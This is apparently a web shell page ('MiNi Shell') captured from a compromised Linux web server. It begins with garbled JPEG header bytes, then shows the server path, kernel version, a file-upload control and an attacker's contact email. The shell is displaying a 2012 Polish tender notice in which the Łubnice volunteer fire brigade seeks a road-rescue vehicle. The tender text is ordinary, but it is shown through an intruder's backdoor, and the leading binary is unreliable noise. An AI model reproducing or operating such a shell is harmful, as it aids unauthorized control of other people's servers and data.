JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120630/228850-N-2012.html

<p class="kh_header"><b>Łubnice: Zakup lekkiego samochodu ratownictwa drogowego wraz z wyposażeniem</b><br>
<b>Numer ogłoszenia: 228850 - 2012; data zamieszczenia: 30.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnocza Straż Pożarna w Łubnicach , ul. Gen. Sikorskiego 98, 98-432 Łubnice, woj. łódzkie, tel. 0-62 7847039, faks 0-62 7847017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup lekkiego samochodu ratownictwa drogowego wraz z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia dostawa lekkiego samochodu ratownictwa drogowego wraz z wyposażeniem.  

2.  Parametry pojazdu:
a) samochód fabrycznie nowy, rok produkcji 2012;
b) gwarancja: min. 2 lata na cały pojazd. Na okres gwarancji wykonawca wydłuża termin rękojmi;
c) silnik: typ turbodiesiel, moc minimalna: 190 KM, spełniający normy spalin min. EURO5;
d) skrzynia biegów: manualna, 6 - biegowa;
e) napęd: 4 x 2;
f) parametry techniczne podwozia pojazdu: techniczna dopuszczalna masa całkowita - max. 7000 kg;
g) układ kierowniczy ze wspomaganiem;
h) Rodzaj nadwozia: kabina min. 5 osobowa, wyposażona w przeszklone drzwi, na ramie samochodu umieszczona zabudowa kontenerowa na sprzęt z dachem użytkowym. Drzwi przedziału załogi umieszczone po obu stronach pojazdu. Maksymalne wymiary całkowite samochodu: długość 750 cm, szerokość 230 cm, wysokość 300 cm;
i) Zabudowa:
- zabudowa kontenerowa umieszczona na ramie pomocniczej konstrukcji metalowej, przytwierdzonej do ramy pojazdu,
- konstrukcja zabudowy wykonana z aluminium i stali nierdzewnej,
- dach zabudowy użytkowy, pokryty blachą aluminiową antypoślizgową, zabezpieczony relingiem, z drabinką wejściową umieszczoną na tylnej ścianie pojazdu, 
- konstrukcja dachu użytkowego musi zapewniać obciążenie masą min. 2 osób + 100 kg na sprzęt,
- dostęp do przedziału sprzętowego za pomocą 5 szt. żaluzji aluminiowych, pyło i bryzgoszczelnych, rozmieszczonych w następujący sposób: 2 szt. z lewej, 2 szt. z prawej i 1 szt. z tyłu zabudowy pojazdu),
- podnoszenie żaluzji ręczne, wspomagane mechanizmem sprężynowym, z blokadą opadania po otwarciu,
- wszystkie skrytki pojazdu wyposażone w zamki zamykane jednym kluczem,
- konstrukcja żaluzji umożliwiająca ich otwarcie i zamknięcie w rękawicach strażackich,
- oświetlenie skrytek załączane centralnym wyłącznikiem w kabinie kierowcy,
- konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza,
- oświetlenie pola pracy na zewnątrz wokół pojazdu,
- wewnątrz zabudowy kontenerowej stelaż z półkami aluminiowymi na sprzęt, z możliwością regulacji wysokości półek,
- w tylnej skrytce zamontowany agregat wodny ze zwijadłem szybkiego natarcia,
- szuflada pod agregat prądotwórczy,
- uchwyt na aparaty powietrzne - 2 szt., uchwyty pod pilarkę i przecinarkę, uchwyty na drabinę na dachu, uchwyty na węże ssawne 110 - 2 szt;
j) Agregat wodno - pianowy:
- pompa wirowa o ciśnieniu roboczym min. 10 bar,
- zwijadło szybkiego natarcia z wężem o długości min. 30m, zakończonym prądownicą,
- zbiornik na wodę o pojemności min. 500 l, 
- zbiornik na wodę wyposażony w nasadę zasilającą z możliwością podłączenia węża W-75,
- silnik agregatu benzynowy z możliwością rozruchu elektrycznego,
- agregat wyposażony w pompę próżniową umożliwiającą zasysanie ze źródła zewnętrznego,
- układ wodno - pianowy z dozownikiem środka pianotwórczego,
- zbiornik środka pianotwórczego min, 50 l;
k) Wyciągarka: dostarcza Zamawiający. Wykonawca dokona montażu z przodu pojazdu;
l) Maszt oświetleniowy: maszt zamontowany na stałe w pojeździe, sterowany ręcznie z najaśnicami o mocy łącznej 1000W, wysokość masztu po rozłożeniu od poziomu do reflektorów nie mniej niż 150 cm
m) Kolor: kabina i zabudowa - czerwony, zderzaki, nadkola i orurowanie - biały, podest dachu, żaluzje - kolor aluminium;
n) Dane techniczne i wyposażenie pojazdu:
- układ hamulcowy hydrauliczny, dwuobwodowy,
- hamulce tarczowe na przedniej i tylnej osi,
- system zapobiegający blokowaniu kół podczas hamowania - ABS,
- system kontroli trakcji zapobiegający poślizgowi kół podczas przyspieszania (typu ASR),
- system elektronicznego rozdziału siły hamowania (typu EBV),
- elektroniczny układ stabilizacji jazdy (typu ESP),
- system kontroli awaryjnego hamowania, tzw. asystent hamowania (typu BAS),
- wspomaganie układu kierowniczego,
- immobiliser,
- kolumna kierownicza regulowana w min. 2 płaszczyznach,
- instalacja elektryczna 12 V,
- dodatkowy akumulator,
- dodatkowe gniazdo 12 V w kabinie kierowcy,
- światła przeciwmgielne, halogenowe,
- pojazd bez wyposażenia w tachograf,
- lusterka zewnętrzne szerokokątne,
- czołowa poduszka powietrzna kierowcy, 
- fotel kierowcy z pełną regulacją,
- wszystkie fotele wyposażone w 3- punktowe pasy bezpieczeństwa,
- podręczne skrytki i półki w kabinie, na dokumentację i drobny sprzęt,
- obicie foteli i pokrycie wnętrza kabiny tapicerką zmywalną typu sztuczna skóra,
- podłoga kabiny wyłożona zmywalną wykładziną antypoślizgową,
- koła min. 16 cali na felgach stalowych,
- pełnowymiarowe koło zapasowe dla każdego rodzaju kół pojazdu (w przypadku różnego rozmiaru kół na osi przedniej i tylnej) + klucz i lewarek,
- zestaw narzędzi,
- trójkąt ostrzegawczy,
- apteczka,
- gaśnica samochodowa,
- klin pod koła,
- hak holowniczy kulowy;
o) Pojazd musi być wyposażony w urządzenie sygnalizacyjno - ostrzegawcze, akustyczne i świetlne z możliwością podawania komunikatów słownych, z manipulatorem wewnątrz kabiny kierowcy, o następujących parametrach:
- poprzeczna belka zespolona sygnalizacyjno - akustyczna na dachu z przodu pojazdu, z lampami błyskowymi koloru niebieskiego i głośnikiem o mocy min. 100 W, napisem STRAŻ i możliwością załączenia tylko sygnalizacji świetlnej bez dźwiękowej,
-  lampa błyskowa niebieska z tyłu zabudowy pojazdu,
- 2 lampy błyskowe niebieskie na masce z przodu pojazdu;
p) Wewnątrz kabiny kierowcy zamontowany radiotelefon w zakresie 136 - 174 MHz o mocy 1-25 W, odstęp między kanałami 12,5 kHz, wraz z instalacją antenową;
q) Samochód musi spełniać wymagania polskich przepisów o ruchu drogowym, z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z Ustawą Prawo o ruchu drogowym. Podwozie musi posiadać świadectwo homologacji typu
r) Samochód musi posiadać niezbędne dokumenty wymagane do rejestracji jako samochód uprzywilejowany w ruchu, pożarniczy lub specjalny.
UWAGA:
Zamawiający wymaga aby samochód posiadał świadectwo dopuszczenia (w rozumieniu przepisów Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania Dz. U. z 2007r. Nr 143, poz. 1002) lub pozytywną opinię Centrum Naukowo- Badawczego Ochrony Przeciwpożarowej im. Józefa Tuliszkowskiego, ul. Nadwiślańska 213, 05-420 Józefów k/ Otwocka. 
Oryginał świadectwa dopuszczenia lub oryginał pozytywnej opinii CNBOP winien być przedstawiony Zamawiającemu najpóźniej w dniu rozpoczęcia odbioru techniczno- jakościowego przedmiotu zamówienia.
Ponadto oferent będzie musiał załączyć najpóźniej w dniu rozpoczęcia odbioru techniczno- jakościowego przedmiotu zamówienia, następujące dokumenty:
- książkę serwisową pojazdu,
- gwarancję na pojazd i na osprzęt 
- instrukcje użytkowania pojazdu i osprzętu
Załączone dokumenty muszą być napisane w języku polskim bądź przetłumaczone na język polski.
Przedmiot zamówienia ma zostać dostarczony do siedziby Zamawiającego bądź w miejsce przez niego wskazane (na terenie gminy) do dnia zakończenia zadania. Dostawca zobowiązany jest w ramach dostawy do przeszkolenia kierowców w zakresie obsługi technicznej samochodu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3, 29.22.15.32-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

Zamawiający dokona oceny spełniania warunków wymaganych od wykonawców wg formuły spełnia - nie spełnia na podstawie złożonych przez wykonawców dokumentów i oświadczeń określonych w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Wypełniony formularz ofertowy stanowiący załącznik nr 1 do SIWZ,
b) Oświadczenie, na podstawie art. 8 ust. 3 ustawy pzp, o nieujawnianiu informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji (dokument fakultatywny, brak dokumentu nie powoduje odrzucenia oferty załącznik nr 6)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
a)	gdy niedotrzymanie pierwotnego terminu realizacji umowy stanowi konsekwencję działania sił wyższych niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych, których nie można było przewidzieć - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji działania siły wyższej. Siła wyższa, o której mowa wyżej jest to zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych którego strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec,  ani któremu nie mogły przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej umowy. 
b)	w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu zadania wraz z odpowiednim zmniejszeniem wynagrodzenia umownego,
c)	wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności, mających bezpośredni wpływ na terminowość wykonywania robót,
d)	ustawowej zmiany podatku od towarów i usług (VAT) (w takim przypadku nie może ulec zmianie wartość wynagrodzenia brutto),
e)	zaistnieje konieczność zrealizowania zadania przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacji technicznej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy - w takim przypadku wykonawca może wnieść o realizację zamówienia przy pomocy innych rozwiązań technicznych / technologicznych o równoważnych lub lepszych parametrach,
f)	obniżenia wynagrodzenia wykonawcy, w tym w wyniku zmniejszenia zakresu rzeczowego robót, skrócenia terminu realizacji umowy, zastosowania zamiennych rozwiązań, materiałów i urządzeń uzgodnionych z Zamawiającym, nie skutkujących podwyższeniem wynagrodzenia wykonawcy

2.	Wprowadzane zmiany postanowień niniejszej umowy muszą być korzystne dla Zamawiającego i nie mogą wprowadzać warunków, które gdyby zostały ujęte w ramach przeprowadzonej procedury przetargowej udzielenia zamówienia umożliwiły by wybór innej oferty niż ta, która została wybrana., a ponadto nie mogą naruszać art. 140 ust. 1 ustawy Prawo zamówień publicznych
3.	W przedstawionych w ust.1 przypadkach, strony ustalają nowe terminy realizacji zamówienia, z tym, że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy będzie równy okresowi przerwy lub przestoju. Dodatkowo przyczyna i okres przesunięcia terminu będzie musiał być szczegółowo uzasadniony przez wykonawcę i zaakceptowany przez zamawiającego. 
4.	Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lubnice.akcessnet.net w dziale Ogłoszenia przetargów, rok 2012<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Łubnicach, ul.gen.Sikorskiego 102, 98-432 Łubnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 12:00, miejsce: Urząd Gminy w Łubnicach
ul. Gen. Sikorskiego 102
98-432 Łubnice
pokój nr 3 (I piętro - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Poprawny adres i numery telefonów Zamawiającego znajdują się w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com